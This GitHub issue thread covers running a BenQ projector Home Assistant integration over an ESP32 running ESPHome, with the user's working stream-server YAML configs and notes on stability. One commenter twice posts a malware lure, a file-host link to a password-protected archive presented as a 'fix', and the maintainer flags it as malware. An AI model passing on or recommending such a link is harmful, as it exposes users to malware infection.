### ISSUE TITLE
ESPHome/ESP32 Support

### ISSUE THREAD

**Issue by mikemulhearn** [rrooggiieerr/homeassistant-benqprojector#15]
Is it possible to use this Integration with an ESPHome board? I have some ESP32 C3s and S2s around that only support ESPHome, so ESP Link is not possible for me at the moment. Just wanted to check if it's possible to use my existing hardware before purchasing additional hardware.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rrooggiieerr** [comment]
Ignore the malicious response from @rickdoq, it's mallware

**Comment by rrooggiieerr** [comment]
You can try one of these ESPHome components:

https://github.com/thegroove/esphome-serial-server
https://github.com/oxan/esphome-stream-server

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by mikemulhearn** [comment]
> You can try one of these ESPHome components:
> 
> https://github.com/thegroove/esphome-serial-server https://github.com/oxan/esphome-stream-server

Thanks @rrooggiieerr, this looks exactly what I needed. Going to explore configuring this weekend. Really appreciate your help and looking forward to using the integration

**Comment by mikemulhearn** [comment]
> > You can try one of these ESPHome components:
> > https://github.com/thegroove/esphome-serial-server https://github.com/oxan/esphome-stream-server
> 
> Thanks @rrooggiieerr, this looks exactly what I needed. Going to explore configuring this weekend. Really appreciate your help and looking forward to using the integration

I was able to get it working with the [esphome-stream-server-v2](https://github.com/tube0013/esphome-stream-server-v2) with my Wemos C3 mini and Benq x3000i. I used the network connection in your Benq integration to connect to the UART stream server on port 6638 with the following ESPHome YAML config on my C3 mini:

`esphome:
  name: benqx3000i 
  friendly_name: BenQ x3000i (ESP32 Serial)

external_components:
  - source: github://tube0013/esphome-stream-server-v2

esp32:
  board: lolin_c3_mini
  framework:
    type: arduino

# Enable logging
logger:
  level: VERBOSE
  baud_rate: 0

# Enable Home Assistant API
api:
  encryption:
    key: "<redacted>"

wifi:
  ssid: !secret wifi_ssid
  password: !secret wifi_password
  ap:
    ssid: "Projector-Serial-Esp32"
    password: "<redacted>"

web_server:
  port: 80

captive_portal:

uart:
  id: uart_bus
  tx_pin: 21
  rx_pin: 20
  baud_rate: 115200

stream_server:
  id: ss
  uart_id: uart_bus
  port: 6638

binary_sensor:
  - platform: stream_server
    name: "Stream Server Connected"
    stream_server: ss 
`

**Comment by rrooggiieerr** [comment]
That's great!

**Comment by mikemulhearn** [comment]
Quick update for a more stable config.

I noticed lots of entity unavailable and downtime and made the following changes:

- Switch to the esp-idf platform (from arduino) which handles the network stack much better
- Changed the stream server to the oxan's version (https://github.com/oxan/esphome-stream-server)
- Set larger stream server buffer sizes
- Increased the Benq integration poll time to 30 seconds

This seems to be very stable with no disconnects/entities becoming unavailable.

ESPHome config:
```
esphome:
  name: benq-x3000i
  friendly_name: BenQ X3000i (Serial Link)

external_components:
  - source: github://oxan/esphome-stream-server

esp32:
  board: lolin_c3_mini
  framework:
    type: esp-idf

# Enable logging
logger:
  level: VERBOSE
  baud_rate: 0     # disable logging to UART

ota:
  password: !secret ota_password
  platform: esphome

safe_mode:
  num_attempts: 10

# Enable Home Assistant API
api:
  encryption:
    key: !secret api_key

wifi:
  ssid: !secret wifi_ssid
  password: !secret wifi_password
  manual_ip:
    static_ip: 172.22.1.230
    gateway: 172.22.1.2
    subnet: 255.255.255.0
  ap:
    ssid: "Projector-Serial-Esp32"
    password: "<redacted>"
  power_save_mode: none

web_server:
  port: 80

captive_portal:

uart:
  id: uart_bus
  tx_pin: 21
  rx_pin: 20
  baud_rate: 115200
  #baud_rate: 9600
  rx_buffer_size: 2048  # Increased UART receive buffer size
  debug:
    direction: BOTH        # log TX and RX
    # optional but handy — print a line at each <CR>
    after:
      delimiter: "\r"
    sequence:
      # choose ONE of the following helpers
      - lambda: UARTDebug::log_string(direction, bytes);
      #- lambda: UARTDebug::log_hex(direction, bytes, ' ');

stream_server:
  id: ss
  uart_id: uart_bus
  port: 6638
  buffer_size: 2048  # Increased from default

binary_sensor:
  - platform: stream_server
    connected:
      name: Connected

sensor:
  - platform: stream_server
    connection_count: 
      name: Number of connections
```

Benq Integration setup (network):

<img width="606" height="387" alt="Image" src="https://github.com/user-attachments/assets/ad624430-4b30-460b-8af7-42a07c4b614f" />

Benq integration interval:

<img width="406" height="247" alt="Image" src="https://github.com/user-attachments/assets/5c437737-4e3c-4eae-b4e5-74dce88615b7" />

**Comment by mikemulhearn** [comment]
spoke a little too soon. this doesn't fully solve my problem, still getting 3-4 brief disconnects per hour.

I think there may be issue with the messages sent in between commands (can't tell yet if it's \r or >) and/or a conflict with two different methods reading from/clearing the buffer before the result of the power status command ('\r*pow=?#\r'). I am going to open a new issue to look into this.
